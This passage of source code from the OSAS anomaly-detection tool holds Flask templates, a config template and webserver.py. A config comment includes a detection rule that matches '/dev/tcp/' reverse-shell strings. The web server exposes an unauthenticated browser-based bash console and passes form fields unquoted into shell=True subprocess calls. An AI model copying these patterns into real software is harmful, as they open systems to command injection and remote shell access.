191 | 
192 |     # load
193 |     p = Pipeline('DEV')
194 |     p.load_config('tests/pipeline_test.conf')
195 |     p.load_model('tests/pipeline.json')
196 |     p(datasource)
197 | 
198 |     for item in datasource[:10]:
199 |         print(item)
200 |         print()
201 |         print()
202 | 


--------------------------------------------------------------------------------
/src/osas/templates/config_manual_update.html:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html>
  2 | <html>
  3 |   <head>
  4 |   <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/css/bootstrap.min.css" integrity="sha384-9gVQ4dYFwwWSjIDZnLEWnxCjeSWFphJiwGPXr1jddIhOegiu1FwO5qRGvFXOdJZ4" crossorigin="anonymous">
  5 |   <script>
  6 |     function onAnomalyChange(selectObject) {
  7 |       supervisedOptions = document.getElementById("supervised-options");
  8 |       if (selectObject.value === "SupervisedClassifierAnomaly") {
  9 |         supervisedOptions.style.display = "block";
 10 |       } else {
 11 |         supervisedOptions.style.display = "none";
 12 |       }
 13 |     }
 14 |   </script>
 15 |   </head>
 16 | 
 17 |   <body>
 18 |   {% if not input %}
 19 |   <h1>Available config files in tests folder:</h1>
 20 |   {% endif %}
 21 | 
 22 |   {% if input %}
 23 |   <h1>Selected config:</h1>
 24 |   {% endif %}
 25 | 
 26 |   {% if not input %}
 27 |   {%for i in range(0, len)%}
 28 | 
 29 |     <p>{{files[i]}}</p>
 30 |     {%endfor%}
 31 |   {% endif %}
 32 |   {% if not input %}
 33 |      <h1>Please input a valid config file from the list above</h1>
 34 |   {% endif %}
 35 |     <form method="POST" action = "/src/osas/confirm_config">
 36 |       <div class = "form-group">
 37 | 
 38 | 
 39 |         <label for="fname"><b>Input Config</b></label>
 40 |         <select name="input" id="input" value="{{input}}">
 41 |           {% for item in files %}
 42 |           <option value="{{ item }}">{{item}}</option>
 43 |           {% endfor %}
 44 |         </select>
 45 |         <br><br>
 46 | 
 47 | 
 48 |         {% if input %}
 49 | 
 50 |         <label for="fname"><b>Output config file</b></label>
 51 |           <input cols="20" type="text" name = "output" value="{{output}}"><b>.conf</b><br><br>
 52 |           <ul>
 53 |             <label for="fname"><b>Select Anomaly Algorithm</b></label>
 54 | 
 55 | 
 56 |               <select name="Anomaly" id="Anomaly" onchange="onAnomalyChange(this)">
 57 |                 {% for item in anomaly_alg %}
 58 |                 <option value="{{ item }}">{{item}}</option>
 59 |                 {% endfor %}
 60 |               </select>
 61 | 
 62 |               <div id="supervised-options" style="display:none;">
 63 |                 <label>Ground truth column:</label>
 64 |                 <input type="text" id="ground-truth-column" name="ground-truth-column" value="status" />
 65 |                 <br />
 66 |                 <label>Classifier:</label>
 67 |                 <input type="text" id="classifier" name="classifier" size="70" value="sklearn.linear_model.LogisticRegression" />
 68 |                 <br />
 69 |                 <label>Model init arguments:</label>
 70 |                 <br />
 71 |                 <textarea id="model-args" name="model-args" rows="4" cols="70">random_state = 42</textarea>
 72 |               </div>
 73 | 
 74 |             <br></br>
 75 | 
 76 |             <label for="fname"><b>Select fields / labels to keep in config</b></label>
 77 |             <table style="width:100%">
 78 | 
 79 |               <tr>
 80 |                 <th>Check</th>
 81 |                 <th>ID</th>
 82 |                 <th>Generator Type</th>
 83 |                 <th>Fields</th>
 84 |               </tr>
 85 |               <br></br>
 86 |               {%for i in range(0, len_config)%}
 87 |               <tr>
 88 |                 <th><input type="checkbox" name="{{config_obj[i][0]}}" value="{{config_obj[i][0]}}" checked/></input></th>
 89 |                 <th><p>{{config_obj[i][0]}} </p></th>
 90 |                 <th><p>{{config_obj[i][1]}} </p></th>
 91 |                 <th><p>{{config_obj[i][2]}} </p></th>
 92 |               </tr>
 93 | 
 94 |               {%endfor%}
 95 | 
 96 | 
 97 |             </table>
 98 | 
 99 | 
100 |         {% endif %}
101 | 
102 |           <p></p>
103 | 
104 |           </ul>
105 |       </div>
106 | 
107 | 
108 |       <br></br>
109 |       <input class="btn btn-primary" type="submit" value="submit">
110 |     </form>
111 | 
112 |   </body>
113 | 
114 | </html>


--------------------------------------------------------------------------------
/src/osas/templates/config_static.txt:
--------------------------------------------------------------------------------
 1 | ; Other supported LG types:
 2 | ; [KB_LG]
 3 | ; generator_type = KeywordBased
 4 | ; field_name = process
 5 | ; keyword_list = ['java', 'bash', 'test']
 6 | ;
 7 | ; [KBB_LG]
 8 | ; generator_type = KnowledgeBased
 9 | ; field_name = process
10 | ; rules_and_labels_tuple_list = [('*java*','java'), ('*/dev/tcp/*','tcp')]


--------------------------------------------------------------------------------
/src/osas/templates/config_text_edit.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 |   <head>
 4 |   <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/css/bootstrap.min.css" integrity="sha384-9gVQ4dYFwwWSjIDZnLEWnxCjeSWFphJiwGPXr1jddIhOegiu1FwO5qRGvFXOdJZ4" crossorigin="anonymous">
 5 |   </head>
 6 | 
 7 |   <body>
 8 |     <h1>Confirm/manual edit config file</h1>
 9 | 
10 |     <ul>
11 |     <form method="POST" action = "/src/osas/confirm_config">
12 |       <label for="fname"><b>Edit Config</b></label>
13 |       <select name="input" id="input" value="{{input}}">
14 |         {% for item in input %}
15 |         <option value="{{ item }}">{{item}}</option>
16 |         {% endfor %}
17 |       </select>
18 |       <br></br>
19 |       <input class="btn btn-primary" type="submit" value="submit">
20 |       <br></br>
21 |       <div class = "form-group">
22 |           <textarea rows="30" cols="150" name="text_box" >{{input_data}}</textarea>
23 |         <br><br>
24 | 
25 |       </div>
26 | 
27 |     </form>
28 |     </ul>
29 |   </body>
30 | 
31 | </html>


--------------------------------------------------------------------------------
/src/osas/templates/console.html:
--------------------------------------------------------------------------------
  1 | <html>
  2 | <head>
  3 |     <link rel="stylesheet" href="https://unpkg.com/xterm@3.6.0/dist/xterm.css" />
  4 | </head>
  5 | <body>
  6 | <div style="width: 100%; height: calc(100% - 50px);" id="terminal"></div>
  7 | 
  8 | <!--<script src="/osas/static/js/xterm.js"></script>-->
  9 | <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
 10 | <script src="https://unpkg.com/xterm@3.6.0/dist/xterm.js"></script>
 11 | <script src="https://unpkg.com/xterm@3.6.0/dist/addons/fit/fit.js"></script>
 12 | <script src="https://unpkg.com/xterm@3.6.0/dist/addons/webLinks/webLinks.js"></script>
 13 | <script src="https://unpkg.com/xterm@3.6.0/dist/addons/fullscreen/fullscreen.js"></script>
 14 | <script src="https://unpkg.com/xterm@3.6.0/dist/addons/search/search.js"></script>
 15 | 
 16 | <script>
 17 |     Terminal.applyAddon(fullscreen)
 18 |     Terminal.applyAddon(fit)
 19 |     Terminal.applyAddon(webLinks)
 20 |     Terminal.applyAddon(search)
 21 |     const xterm = new Terminal({
 22 |         cursorBlink: true,
 23 |         macOptionIsMeta: true,
 24 |         scrollback: true,
 25 |     });
 26 |     xterm.open(document.getElementById('terminal'));
 27 |     xterm.fit()
 28 |     xterm.resize(15, 50)
 29 |     console.log(`size: ${xterm.cols} columns, ${xterm.rows} rows`)
 30 | 
 31 |     xterm.fit()
 32 | 
 33 | 
 34 |     function fitToscreen() {
 35 |         xterm.fit()
 36 |         const requestOptions = {
 37 |             method: 'POST',
 38 |             headers: {'Content-Type': 'application/json'},
 39 |             body: JSON.stringify({
 40 |                 'row': xterm.rows,
 41 |                 'col': xterm.cols
 42 |             })
 43 |         };
 44 |         fetch('/osas/console/size', requestOptions).then(response => response.text()).then(data => {
 45 |         });
 46 |         //socket.emit("resize", {"cols": term.cols, "rows": term.rows})
 47 |     }
 48 | 
 49 |     function debounce(func, wait_ms) {
 50 |         let timeout
 51 |         return function (...args) {
 52 |             const context = this
 53 |             clearTimeout(timeout)
 54 |             timeout = setTimeout(() => func.apply(context, args), wait_ms)
 55 |         }
 56 |     }
 57 | 
 58 |     const wait_ms = 50;
 59 |     window.onresize = debounce(fitToscreen, wait_ms)
 60 | 
 61 |     function runFakeTerminal(xterm) {
 62 |         const term = xterm//.getTerminal();
 63 |         var shellprompt = '$ ';
 64 |         fitToscreen();
 65 | 
 66 |         function prompt() {
 67 |             term.write('\r\n' + shellprompt);
 68 |         }
 69 | 
 70 |         term.writeln('OSAS shell v1.0.1');
 71 |         term.writeln('Use carefully.');
 72 |         term.writeln('');
 73 |         prompt();
 74 | 
 75 |         term.on('key', function (key, ev) {
 76 |             postToTerminal(key, ev.keyCode, ev.altKey, ev.ctrlKey, ev.metaKey, term);
 77 |         });
 78 | 
 79 |         term.on('paste', function (data, ev) {
 80 |             // xterm.write(data);
 81 |             for (i = 0; i < data.length; i++){
 82 |                 postToTerminal(data.charAt(i), data.charAt(i), false, false, false, xterm);
 83 |             }
 84 |         });
 85 |     }
 86 | 
 87 |     function postToTerminal(ascKey, kCode, aKey, cKey, mKey, xterm) {
 88 |         console.log('sending ' + kCode);
 89 |         const requestOptions = {
 90 |             method: 'POST',
 91 |             headers: {'Content-Type': 'application/json'},
 92 |             body: JSON.stringify({
 93 |                 asciiKey: ascKey,
 94 |                 keyCode: kCode,
 95 |                 ctrlKey: cKey,
 96 |                 altKey: aKey,
 97 |                 metaKey: mKey
 98 |             })
 99 |         };
100 |         fetch('/osas/console/write', requestOptions).then(response => response.text()).then(data => {
101 |             xterm.write(data);
102 |         });
103 |     }
104 | 
105 |     function bin2String(array) {
106 |         var result = "";
107 |         for (var i = 0; i < array.length; i++) {
108 |             result += String.fromCharCode(parseInt(array[i], 2));
109 |         }
110 |         return result;
111 |     }
112 | 
113 |     function read_console() {
114 |         console.log('read_console');
115 |         const requestOptions = {
116 |             method: 'POST',
117 |             headers: {'Content-Type': 'application/json'},
118 |             body: JSON.stringify({
119 |                 empty: ''
120 |             })
121 |         };
122 |         fetch('/osas/console/read', requestOptions).then(response => response.text()).then(data => {
123 |             xterm.write(data);
124 |         });
125 |         setTimeout(read_console, 50)
126 |     }
127 | 
128 | 
129 |     $(document).ready(function () {
130 |         runFakeTerminal(xterm);
131 |         setTimeout(read_console, 50)
132 |     });
133 | 
134 | 
135 | </script>
136 | </body>
137 | </html>


--------------------------------------------------------------------------------
/src/osas/templates/generate_config.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 |   <head>
 4 |   <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/css/bootstrap.min.css" integrity="sha384-9gVQ4dYFwwWSjIDZnLEWnxCjeSWFphJiwGPXr1jddIhOegiu1FwO5qRGvFXOdJZ4" crossorigin="anonymous">
 5 |   </head>
 6 | 
 7 |   <body>
 8 |     <h1>Available files in tests folder:</h1>
 9 |     {%for i in range(0, len)%}
10 | 
11 |     <p>{{files[i]}}</p>
12 |     {%endfor%}
13 |      <h1>Please input a valid dataset from the list above</h1>
14 |     <form method="POST" action = "/src/osas/generate_config">
15 |       <div class = "form-group">
16 |         <label for="fname"><b>Input Dataset</b></label>
17 |         <select name="input" id="input">
18 |           {% for item in files %}
19 |           <option value="{{ item }}">{{item}}</option>
20 |           {% endfor %}
21 |         </select>
22 |         <br><br>
23 |         <label for="fname"><b>Output config file</b></label>
24 |         <input type="text" name = "output"><b>.conf</b><br><br>
25 |       </div>
26 |       <input class="btn btn-primary" type="submit" value="submit">
27 |     </form>
28 | 
29 |   </body>
30 | 
31 | </html>


--------------------------------------------------------------------------------
/src/osas/templates/run_full_process.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 |   <head>
 4 |   <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/css/bootstrap.min.css" integrity="sha384-9gVQ4dYFwwWSjIDZnLEWnxCjeSWFphJiwGPXr1jddIhOegiu1FwO5qRGvFXOdJZ4" crossorigin="anonymous">
 5 |   </head>
 6 | 
 7 |   <body>
 8 |     <h1>Available files in tests folder:</h1>
 9 |     {%for i in range(0, len)%}
10 | 
11 |     <p>{{files[i]}}</p>
12 |     {%endfor%}
13 |      <h1>Please input a valid dataset from the list above</h1>
14 |     <form method="POST" action = "/src/osas/run_full_process">
15 |       <div class = "form-group">
16 |         <label for="fname"><b>Input Dataset</b></label>
17 |         <select name="input" id="input">
18 |           {% for item in files %}
19 |           <option value="{{ item }}">{{item}}</option>
20 |           {% endfor %}
21 |         </select>
22 |         <br><br>
23 |         <label for="fname"><b>Output file</b></label>
24 |         <input type="text" name = "output"><b>.csv</b><br><br>
25 |       </div>
26 |       <input class="btn btn-primary" type="submit" value="submit">
27 |     </form>
28 | 
29 |   </body>
30 | 
31 | </html>


--------------------------------------------------------------------------------
/src/osas/templates/run_pipeline.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 |   <head>
 4 |   <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/css/bootstrap.min.css" integrity="sha384-9gVQ4dYFwwWSjIDZnLEWnxCjeSWFphJiwGPXr1jddIhOegiu1FwO5qRGvFXOdJZ4" crossorigin="anonymous">
 5 |   </head>
 6 | 
 7 |   <body>
 8 | 
 9 | 
10 |   <h1>Available datasets in tests folder:</h1>
11 |   {%for i in range(0, len_dataset)%}
12 | 
13 |   <p>{{dataset[i]}}</p>
14 |   {%endfor%}
15 |     <h1>Available config in tests folder:</h1>
16 |     {%for i in range(0, len)%}
17 |     <p>{{files[i]}}</p>
18 |     {%endfor%}
19 |   <h1>Available pipelines in tests folder:</h1>
20 |   {%for i in range(0, len_pipeline)%}
21 | 
22 |   <p>{{pipeline[i]}}</p>
23 |   {%endfor%}
24 |      <h1>Please input a valid config file from the list above</h1>
25 |     <form method="POST" action = "/src/osas/run_pipeline">
26 |       <div class = "form-group">
27 |         <label for="fname"><b>Input Dataset</b></label>
28 |         <select name="input" id="input">
29 |           {% for item in dataset %}
30 |           <option value="{{ item }}">{{item}}</option>
31 |           {% endfor %}
32 |         </select>
33 |         <br><br>
34 | 
35 |         <label for="fname"><b>Input Conf</b></label>
36 |         <select name="input_conf" id="input_conf">
37 |           {% for item in files %}
38 |           <option value="{{ item }}">{{item}}</option>
39 |           {% endfor %}
40 |         </select>
41 |         <br><br>
42 | 
43 | 
44 |         <label for="fname"><b>Input pipeline model file</b></label>
45 |         <select name="model_conf" id="model_conf">
46 |           {% for item in pipeline %}
47 |           <option value="{{ item }}">{{item}}</option>
48 |           {% endfor %}
49 |         </select>
50 |         <br><br>
51 | 
52 |         <label for="fname"><b>Anomaly Scoring results</b></label>
53 |         <input type="text" name = "output"><b>.csv</b><br><br>
54 |       </div>
55 |       <input class="btn btn-primary" type="submit" value="submit">
56 |     </form>
57 | 
58 |   </body>
59 | 
60 | </html>


--------------------------------------------------------------------------------
/src/osas/templates/train_pipeline.html:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 |   <head>
 4 |   <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/css/bootstrap.min.css" integrity="sha384-9gVQ4dYFwwWSjIDZnLEWnxCjeSWFphJiwGPXr1jddIhOegiu1FwO5qRGvFXOdJZ4" crossorigin="anonymous">
 5 |   </head>
 6 | 
 7 |   <body>
 8 | 
 9 | 
10 |   <h1>Available datasets in tests folder:</h1>
11 |   {%for i in range(0, len_dataset)%}
12 | 
13 |   <p>{{dataset[i]}}</p>
14 |   {%endfor%}
15 | 
16 |     <h1>Available config in tests folder:</h1>
17 |     {%for i in range(0, len)%}
18 | 
19 |     <p>{{files[i]}}</p>
20 |     {%endfor%}
21 | 
22 |      <h1>Please input a valid config file from the list above</h1>
23 |     <form method="POST" action = "/src/osas/train_pipeline">
24 |       <div class = "form-group">
25 |         <label for="fname"><b>Input Dataset</b></label>
26 |         <select name="input" id="input">
27 |           {% for item in dataset %}
28 |           <option value="{{ item }}">{{item}}</option>
29 |           {% endfor %}
30 |         </select>
31 |         <br><br>
32 | 
33 |         <label for="fname"><b>Input Conf</b></label>
34 |         <select name="input_conf" id="input_conf">
35 |           {% for item in files %}
36 |           <option value="{{ item }}">{{item}}</option>
37 |           {% endfor %}
38 |         </select>
39 |         <br><br>
40 | 
41 |         <label for="fname"><b>Output pipeline model</b></label>
42 |         <input type="text" name = "output" value="file_name"><b>.model</b><br><br>
43 |       </div>
44 |       <input class="btn btn-primary" type="submit" value="submit">
45 |     </form>
46 | 
47 |   </body>
48 | 
49 | </html>


--------------------------------------------------------------------------------
/src/osas/webserver.py:
--------------------------------------------------------------------------------
  1 | #
  2 | # Authors: Security Intelligence Team within the Security Coordination Center
  3 | #
  4 | # Copyright (c) 2018 Adobe Systems Incorporated. All rights reserved.
  5 | #
  6 | # Licensed under the Apache License, Version 2.0 (the "License");
  7 | # you may not use this file except in compliance with the License.
  8 | # You may obtain a copy of the License at
  9 | #
 10 | # http://www.apache.org/licenses/LICENSE-2.0
 11 | #
 12 | # Unless required by applicable law or agreed to in writing, software
 13 | # distributed under the License is distributed on an "AS IS" BASIS,
 14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 15 | # See the License for the specific language governing permissions and
 16 | # limitations under the License.
 17 | #
 18 | 
 19 | from flask import Flask
 20 | from flask import Response
 21 | from flask import request
 22 | from flask import render_template, send_from_directory, send_file
 23 | from os import listdir
 24 | from os.path import isfile, join
 25 | import subprocess
 26 | import configparser
 27 | import pty
 28 | import os
 29 | import threading
 30 | import shlex
 31 | import select
 32 | import struct
 33 | import termios
 34 | import fcntl
 35 | 
 36 | if os.path.isdir('/app'):
 37 |     data_path='/app/'
 38 | else:
 39 |     data_path = 'tests/'
 40 | 
 41 | app = Flask(__name__)
 42 | pty_buffer = []
 43 | 
 44 | 
 45 | @app.route('/', defaults={'path': ''})
 46 | @app.route('/osas')
 47 | def index():
 48 |     text = '''<br>OSAS server is running</br>
 49 |             <br>For console interaction, go to <a href="/osas/console">http://127.0.0.1:8888/osas/console</a> and follow the steps</br>
 50 |             <br>For automated pipeline, go to <a href="/osas/run_full_process">http://127.0.0.1:8888/osas/run_full_process</a></br>
 51 |             <br>For custom pipeline, go to <a href="/osas/generate_config">http://127.0.0.1:8888/osas/generate_config</a> and follow the steps</br>
 52 |             '''
 53 |     return text
 54 | 
 55 | 
 56 | @app.route('/osas/static/<path:filename>')
 57 | def assets(filename):
 58 |     # Add custom handling here.
 59 |     # Send a file download response.
 60 |     # print(path)
 61 |     print(filename)
 62 |     return send_file('templates/static/{0}'.format(filename))
 63 | 
 64 | 
 65 | @app.route('/osas/console', methods=['GET', 'POST'])
 66 | def console_print():
 67 |     return render_template("console.html")
 68 | 
 69 | 
 70 | @app.route('/osas/console/read', methods=['GET', 'POST'])
 71 | def console_read():
 72 |     global pty_buffer
 73 |     tmp = pty_buffer
 74 |     pty_buffer = []
 75 | 
 76 |     return ''.join([chr(c) for c in tmp])
 77 | 
 78 | 
 79 | @app.route('/osas/console/size', methods=['GET', 'POST'])
 80 | def console_size():
 81 |     xpix = 0
 82 |     ypix = 0
 83 | 
 84 |     global pty_fd
 85 |     data = request.json
 86 |     print(data)
 87 |     winsize = struct.pack("HHHH", data['row'], data['col'], xpix, ypix)
 88 |     fcntl.ioctl(pty_fd, termios.TIOCSWINSZ, winsize)
 89 |     return ''
 90 | 
 91 | 
 92 | @app.route('/osas/console/write', methods=['GET', 'POST'])
 93 | def console_write():
 94 |     data = request.json
 95 |     # print(data)
 96 |     global pty_fd
 97 |     data = data['asciiKey'].encode()
 98 |     # print(data)
 99 |     os.write(pty_fd, data)
100 | 
101 |     global pty_buffer
102 |     tmp = pty_buffer
103 |     pty_buffer = []
104 |     # print("returning {0}".format(tmp))
105 |     return ''.join([chr(c) for c in tmp])
106 | 
107 | 
108 | pty_fd = None
109 | 
110 | 
111 | def pty_read(f):
112 |     global pty_fd
113 |     pty_fd = f
114 | 
115 |     def rthread(fd):
116 |         while (True):
117 |             import time
118 |             time.sleep(0.02)
119 |             (data_ready, _, _) = select.select([fd], [], [], 0)
120 |             if data_ready:
121 |                 global pty_buffer
122 |                 data = os.read(fd, 1024 * 1024)
123 |                 # print(str(data))
124 |                 pty_buffer += data  # data.decode("utf-8")
125 | 
126 |     x = threading.Thread(target=rthread, args=(f,), daemon=True)
127 |     x.start()
128 | 
129 | 
130 | # def pty_start():
131 | #     pty.spawn("bash", pty_read)
132 | #
133 | #
134 | # x = threading.Thread(target=pty_start, args=(), daemon=True)
135 | # x.start()
136 | 
137 | (child_pid, fd) = pty.fork()
138 | if child_pid == 0:
139 |     # this is the child process fork.
140 |     # anything printed here will show up in the pty, including the output
141 |     # of this subprocess
142 |     subprocess.run("bash")
143 | else:
144 |     # this is the parent process fork.
145 |     # store child fd and pid
146 |     # app.config["fd"] = fd
147 |     # app.config["child_pid"] = child_pid
148 |     # set_winsize(fd, 50, 50)
149 |     pty_fd = fd
150 |     os.write(pty_fd, 'export TERM=xterm\n'.encode())
151 |     cmd = " ".join(shlex.quote(c) for c in "bash")
152 |     print("child pid is", child_pid)
153 |     print(
154 |         f"starting background task with command `{cmd}` to continously read "
155 |         "and forward pty output to client"
156 |     )
157 |     # socketio.start_background_task(target=read_and_forward_pty_output)
158 |     print("task started")
159 |     print(pty_fd)
160 |     pty_read(pty_fd)
161 | 
162 | 
163 | @app.route('/osas/generate_config', methods=['GET', 'POST'])
164 | def generate_config():
165 |     print(request.method)
166 |     if request.method == 'GET':
167 |         onlyfiles = [f for f in listdir(data_path) if
168 |                      isfile(join(data_path, f)) and '.conf' not in f and 'pipeline' not in f and '.model' not in f]
169 |         files = onlyfiles
170 | 
171 |         return render_template("generate_config.html", files=files, len=len(files))
172 | 
173 |     if request.method == 'POST':
174 |         data = request.form.to_dict()
175 |         # print(data)
176 |         input = data['input']
177 |         output = data['output']
178 |         print(input)
179 |         print(output)
180 |         if '.conf' not in output:
181 |             output += '.conf'
182 | 
183 |         def inner():
184 |             proc = subprocess.Popen(['python3 osas/main/autoconfig.py --input-file={} --output-file={} 2>&1'.format(
185 |                 data_path + input, data_path + output)], shell=True, stdout=subprocess.PIPE)
186 | 
187 |             for line in iter(proc.stdout.readline, ''):
188 |                 try:
189 |                     yield line.rstrip().decode('ascii') + '<br/>\n'
190 |                 except:
191 |                     a = None
192 |                 poll = proc.poll()
193 |                 if poll is not None:
194 |                     yield 'DONE!<br/>\n'
195 |                     full_text = """go to <a href="/osas/confirm_config">http://127.0.0.1:8888/osas/confirm_config</a>
196 |                      <script>
197 |     setTimeout(function(){
198 |         window.location.href = '/osas/confirm_config';
199 |     }, 10000);
200 | </script>"""
201 |                     # yield 'go to <a href="/osas/confirm_config">http://127.0.0.1:8888/osas/confirm_config</a>'
202 |                     yield full_text
203 |                     break
204 | 
205 |         #
206 |         return Response(inner(), mimetype='text/html')
207 |         # return request.data
208 | 
209 | 
210 | @app.route('/osas/confirm_config', methods=['GET', 'POST'])
211 | def confirm_config():
212 |     config = configparser.ConfigParser()
213 |     print(request.method)
214 | 
215 |     if request.method == 'GET':
216 |         onlyfiles = [f for f in listdir(data_path) if
217 |                      isfile(join(data_path, f)) and '.conf' in f and 'pipeline' not in f]
218 |         files = onlyfiles
219 |         return render_template("config_manual_update.html", files=files, len=len(files))
220 | 
221 |     if request.method == 'POST':
222 |         print(request.form)
223 |         print('here')
224 |         input = request.form['input']
225 |         try:
226 |             output = request.form['output']
227 |         except:
228 |             output = None
229 |         try:
230 |             text_box = request.form['text_box']
231 |         except:
232 |             text_box = None
233 | 
234 |         if output == None and text_box == None:
235 |             files = [str(input)]
236 |             config_data = 'data'
237 |             config.read(data_path + input)
238 |             # print(config.sections())
239 |             config_obj = []
240 |             for section in config.sections():
241 |                 elem = []
242 |                 if section == 'AnomalyScoring':
243 |                     a = 1
244 |                 else:
245 | 
246 |                     elem.append(section)
247 |                     elem.append(config[section]['generator_type'])
248 |                     try:
249 |                         elem.append(config[section]['field_name'])
250 |                     except:
251 |                         elem.append(config[section]['field_names'])
252 | 
253 |                     config_obj.append(elem)
254 | 
255 |             # print(config_obj)
256 |             output = "tailored_" + input.replace('.conf', '')
257 |             Anomaly_list = ['StatisticalNGramAnomaly', 'SVDAnomaly', 'LOFAnomaly', 'IFAnomaly', 'SupervisedClassifierAnomaly']
258 |             return render_template("config_manual_update.html", files=files, len=len(files), config=config_data,
259 |                                    input=input, config_obj=config_obj, len_config=len(config_obj),
260 |                                    anomaly_alg=Anomaly_list, output=output)
261 | 
262 |         elif output != None:
263 |             data = request.form.to_dict()
264 |             output = data['output'] + '.conf'
265 |             data.pop('output')
266 |             input = data['input']
267 |             data.pop('input')
268 |             Anomaly = data['Anomaly']
269 |             data.pop('Anomaly')
270 |             ground_truth_column = data['ground-truth-column']
271 |             data.pop('ground-truth-column')
272 |             classifier = data['classifier']
273 |             data.pop('classifier')
274 |             model_args = data['model-args']
275 |             data.pop('model-args')
276 |             labels = list(data.keys())
277 |             print(labels)
278 | 
279 |             config.read(data_path + input)
280 |             new_config = configparser.ConfigParser()
281 |             for label in labels:
282 |                 print(config[label])
283 |                 new_config[label] = config[label]
284 |             new_config['AnomalyScoring'] = config['AnomalyScoring']
285 |             new_config['AnomalyScoring']['scoring_algorithm'] = Anomaly
286 |             if Anomaly == 'SupervisedClassifierAnomaly':
287 |                 new_config['AnomalyScoring']['ground_truth_column'] = ground_truth_column
288 |                 new_config['AnomalyScoring']['classifier'] = classifier
289 |                 model_args = model_args.split('\n')
290 |                 for model_arg in model_args:
291 |                     model_arg = model_arg.split('=')
292 |                     new_config['AnomalyScoring'][model_arg[0].strip()] = model_arg[1].strip()
293 |             with open(data_path + output, 'w') as configfile:
294 |                 new_config.write(configfile)
295 |             input_data = open('osas/templates/config_static.txt', 'r').read() + "\n\n" + open(data_path + output,
296 |                                                                                               'r').read()
297 |             print(output)
298 |             # print(input_data)
299 |             return render_template("config_text_edit.html", input=[output], input_data=input_data)
300 | 
301 |         elif output == None and text_box != None:
302 |             data = request.form.to_dict()
303 |             input = data['input']
304 |             text_box = data['text_box']
305 | 
306 |             with open(data_path + input, 'w') as configfile:
307 |                 configfile.write(text_box)
308 |             return '<script>document.location.href="http://127.0.01:8888/osas/train_pipeline"</script>'
309 | 
310 | 
311 | @app.route('/osas/train_pipeline', methods=['GET', 'POST'])
312 | def train_pipeline():
313 |     print(request.method)
314 |     if request.method == 'GET':
315 |         onlyfiles = [f for f in listdir(data_path) if isfile(join(data_path, f)) and '.conf' in f and '.model' not in f]
316 |         files = onlyfiles
317 | 
318 |         onlyfiles_dataset = [f for f in listdir(data_path) if
319 |                              isfile(join(data_path, f)) and '.conf' not in f and '.model' not in f]
320 |         dataset = onlyfiles_dataset
321 | 
322 |         return render_template("train_pipeline.html", files=files, len=len(files), dataset=dataset,
323 |                                len_dataset=len(dataset))
324 | 
325 |     if request.method == 'POST':
326 |         input = request.form['input']
327 |         input_conf = request.form['input_conf']
328 | 
329 |         output = request.form['output']
330 |         print(input)
331 |         print(output)
332 |         if '.model' not in output:
333 |             output += '.model'
334 | 
335 |         def inner():
336 |             proc = subprocess.Popen([
337 |                 'python3 osas/main/train_pipeline.py --input-file={} --conf-file={} --model-file={} 2>&1'.format(
338 |                     data_path + input, data_path + input_conf, data_path + output)], shell=True,
339 |                 stdout=subprocess.PIPE)
340 | 
341 |             for line in iter(proc.stdout.readline, ''):
342 |                 try:
343 |                     yield line.rstrip().decode('ascii') + '<br/>\n'
344 |                 except:
345 |                     a = None
346 |                 poll = proc.poll()
347 |                 if poll is not None:
348 |                     yield 'DONE!<br/>\n'
349 |                     # yield 'go to <a href="/osas/run_pipeline">http://127.0.0.1:8888/osas/run_pipeline</a>'
350 |                     full_text = """go to <a href="/osas/run_pipeline">http://127.0.0.1:8888/osas/run_pipeline</a>
351 |                         <script>
352 |                     setTimeout(function(){
353 |                         window.location.href = '/osas/run_pipeline';
354 |                     }, 10000);
355 |                         </script>"""
356 |                     yield full_text
357 |                     break
358 | 
359 |         #
360 |         return Response(inner(), mimetype='text/html')
361 | 
362 | 
363 | @app.route('/osas/run_pipeline', methods=['GET', 'POST'])
364 | def run_pipeline():
365 |     print(request.method)
366 |     if request.method == 'GET':
367 |         onlyfiles = [f for f in listdir(data_path) if
368 |                      isfile(join(data_path, f)) and '.conf' in f and 'pipeline' not in f]
369 |         files = onlyfiles
370 | 
371 |         onlyfiles_dataset = [f for f in listdir(data_path) if
372 |                              isfile(join(data_path, f)) and '.conf' not in f and '.model' not in f]
373 |         dataset = onlyfiles_dataset
374 | 
375 |         onlyfiles_dataset = [f for f in listdir(data_path) if isfile(join(data_path, f)) and '.model' in f]
376 |         pipeline = onlyfiles_dataset
377 | 
378 |         return render_template("run_pipeline.html", files=files, len=len(files), dataset=dataset,
379 |                                len_dataset=len(dataset), pipeline=pipeline, len_pipeline=len(pipeline))
380 | 
381 |     if request.method == 'POST':
382 |         input = request.form['input']
383 |         input_conf = request.form['input_conf']
384 |         model_conf = request.form['model_conf']
385 | 
386 |         output = request.form['output']
387 |         print(input)
388 |         print(output)
389 |         if '.csv' not in output:
390 |             output += '.csv'
391 | 
392 |         def inner():
393 |             proc = subprocess.Popen([
394 |                 'python3 osas/main/run_pipeline.py --input-file={} --conf-file={} --model-file={} --output-file={} 2>&1'.format(
395 |                     data_path + input, data_path + input_conf, data_path + model_conf,
396 |                     data_path + output)], shell=True, stdout=subprocess.PIPE)
397 | 
398 |             for line in iter(proc.stdout.readline, ''):
399 |                 try:
400 |                     yield line.rstrip().decode('ascii') + '<br/>\n'
401 |                 except:
402 |                     a = None
403 |                 poll = proc.poll()
404 |                 if poll is not None:
405 |                     yield 'DONE!<br/>\n'
406 |                     # yield 'go to kibana http://127.0.0.1:5601'
407 |                     full_text = """go to http://127.0.0.1:5601</a>
408 |                         <script>
